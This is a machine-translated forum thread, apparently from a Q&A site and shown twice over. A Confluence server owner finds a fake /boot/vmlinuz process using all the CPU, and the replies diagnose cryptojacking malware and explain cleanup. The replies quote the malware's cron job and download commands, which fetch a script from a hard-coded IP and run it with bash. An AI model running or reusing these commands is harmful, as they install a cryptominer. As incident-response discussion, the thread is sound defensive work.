vmlinuz 进程以 100% CPU 运行
vmlinuz process runs on 100% CPU
我是 运行 VPS 上的一个 Jira 和一个 Confluence 实例(和 nginx 反向代理)。目前,由于某种原因我无法启动汇合,我认为这是其他原因造成的。
我查看了进程列表:
confluence
用户 运行 /boot/vmlinuz
进程并且它吃掉了 CPU。如果我 kill -9
这个过程会在几秒钟后再次开始。
重启后 VPS:
- Confluence 和 Jira 自动启动。
- Confluence 是 运行 几秒钟正确然后某些东西终止了进程。 Jira进程仍然是运行.
/boot/vmlinuz
进程开始。
我已经把Confluence的自动启动去掉了,不过没关系。
所以我的问题:
- 这个
/boot/vmlinuz
过程是什么?我从没见过这个。 (是的,我知道,vmlinuz 是内核)
- 为什么一遍又一遍地开始并以 100% 的速度运行 CPU?
- 我应该怎么做才能恢复正常行为,我可以启动 Confluence 吗?
谢谢大家的回答
更新
它是由黑客引起的。如果您找到 /tmp/seasame
文件,则您的服务器已被感染。它使用 cron 下载此文件。我已经删除了 /tmp
文件夹中的文件,终止了所有进程,禁用了 confluence 用户的 cron,并更新了 Confluence。
您的服务器似乎被黑了。
请仔细查看进程列表。
例如运行 ps auxc
并查看进程二进制源。
你可以使用像 rkhunter 这样的工具来扫描你的服务器,但通常你应该在开始时杀死所有以 confluence 用户身份午餐的东西,扫描你的 server/account,升级你的 confluence(在大多数情况下用户决定攻击源),并在您的 confluence 中查找其他帐户等。
如果您想查看该进程中的内容,请查看 /proc,例如在 ls -la /proc/996
。你也会在那里看到源二进制文件。您还可以午餐 strace -ff -p 996
查看正在执行的进程或 cat /proc/996/exe | strings
查看二进制文件有哪些字符串。这可能是某种僵尸网络部分、矿工等
我也遇到了同样的问题,可能是合流的bug。我只是杀了合流进程,它就没事了。
我也遇到过同样的问题,被黑了,病毒脚本在/tmp,通过命令"top"找到脚本名(无意义的字母,"fcbk6hj"的名字是我的。)并杀死进程(可能是 3 个进程)
root 3158 1 0 15:18 ? 00:00:01./fcbk6hj./jd8CKgl
根 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
根 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
全部杀掉,删除/tmp/prot,杀掉/boot/vmlinuz,CPU后面的进程。
我发现病毒自动将脚本下载到/tmp,我的方法是mv wgetak到其他名字。
病毒行为:
wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
发现crontab中写了如下任务,删除即可:
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
从系统和 crontab 中删除它后,将 confluence 用户添加到 /etc/cron.deny
可能是个好主意(至少现在)。
之后:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
如您所知,这是恶意软件 — 实际上 cryptojacking malware, intended to use your CPU as a cryptocurrency miner。
您的服务器很可能因为 Confluence 漏洞而受到威胁(请参阅 this reddit post 的第一个答案),但是 大家应该知道这 不是唯一的方法OF PROPAGATION — 这怎么强调都不为过。事实上,我的一台服务器也被入侵了,尽管它没有 运行 Confluence(我什至不知道这个软件......),所谓的 /boot/vmlinuz
过程是 运行 来自 root
.
此外,请注意此恶意软件会尝试使用 known_hosts
和 SSH 密钥通过 SSH 进行传播,因此您应该检查从该服务器访问的其他计算机。
最后,reddit post 链接到此恶意软件的 this comprehensive description,值得一读。
注意:不要忘记向 IP 的 ISP 滥用电子邮件地址发送报告。
我是 运行 VPS 上的一个 Jira 和一个 Confluence 实例(和 nginx 反向代理)。目前,由于某种原因我无法启动汇合,我认为这是其他原因造成的。
我查看了进程列表:
confluence
用户 运行 /boot/vmlinuz
进程并且它吃掉了 CPU。如果我 kill -9
这个过程会在几秒钟后再次开始。
重启后 VPS:
- Confluence 和 Jira 自动启动。
- Confluence 是 运行 几秒钟正确然后某些东西终止了进程。 Jira进程仍然是运行.
/boot/vmlinuz
进程开始。
我已经把Confluence的自动启动去掉了,不过没关系。
所以我的问题:
- 这个
/boot/vmlinuz
过程是什么?我从没见过这个。 (是的,我知道,vmlinuz 是内核) - 为什么一遍又一遍地开始并以 100% 的速度运行 CPU?
- 我应该怎么做才能恢复正常行为,我可以启动 Confluence 吗?
谢谢大家的回答
更新
它是由黑客引起的。如果您找到 /tmp/seasame
文件,则您的服务器已被感染。它使用 cron 下载此文件。我已经删除了 /tmp
文件夹中的文件,终止了所有进程,禁用了 confluence 用户的 cron,并更新了 Confluence。
您的服务器似乎被黑了。
请仔细查看进程列表。
例如运行 ps auxc
并查看进程二进制源。
你可以使用像 rkhunter 这样的工具来扫描你的服务器,但通常你应该在开始时杀死所有以 confluence 用户身份午餐的东西,扫描你的 server/account,升级你的 confluence(在大多数情况下用户决定攻击源),并在您的 confluence 中查找其他帐户等。
如果您想查看该进程中的内容,请查看 /proc,例如在 ls -la /proc/996
。你也会在那里看到源二进制文件。您还可以午餐 strace -ff -p 996
查看正在执行的进程或 cat /proc/996/exe | strings
查看二进制文件有哪些字符串。这可能是某种僵尸网络部分、矿工等
我也遇到了同样的问题,可能是合流的bug。我只是杀了合流进程,它就没事了。
我也遇到过同样的问题,被黑了,病毒脚本在/tmp,通过命令"top"找到脚本名(无意义的字母,"fcbk6hj"的名字是我的。)并杀死进程(可能是 3 个进程)
root 3158 1 0 15:18 ? 00:00:01./fcbk6hj./jd8CKgl 根 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl 根 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
全部杀掉,删除/tmp/prot,杀掉/boot/vmlinuz,CPU后面的进程。
我发现病毒自动将脚本下载到/tmp,我的方法是mv wgetak到其他名字。
病毒行为: wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
发现crontab中写了如下任务,删除即可: */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
从系统和 crontab 中删除它后,将 confluence 用户添加到 /etc/cron.deny
可能是个好主意(至少现在)。
之后:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
如您所知,这是恶意软件 — 实际上 cryptojacking malware, intended to use your CPU as a cryptocurrency miner。
您的服务器很可能因为 Confluence 漏洞而受到威胁(请参阅 this reddit post 的第一个答案),但是 大家应该知道这 不是唯一的方法OF PROPAGATION — 这怎么强调都不为过。事实上,我的一台服务器也被入侵了,尽管它没有 运行 Confluence(我什至不知道这个软件......),所谓的 /boot/vmlinuz
过程是 运行 来自 root
.
此外,请注意此恶意软件会尝试使用 known_hosts
和 SSH 密钥通过 SSH 进行传播,因此您应该检查从该服务器访问的其他计算机。
最后,reddit post 链接到此恶意软件的 this comprehensive description,值得一读。
注意:不要忘记向 IP 的 ISP 滥用电子邮件地址发送报告。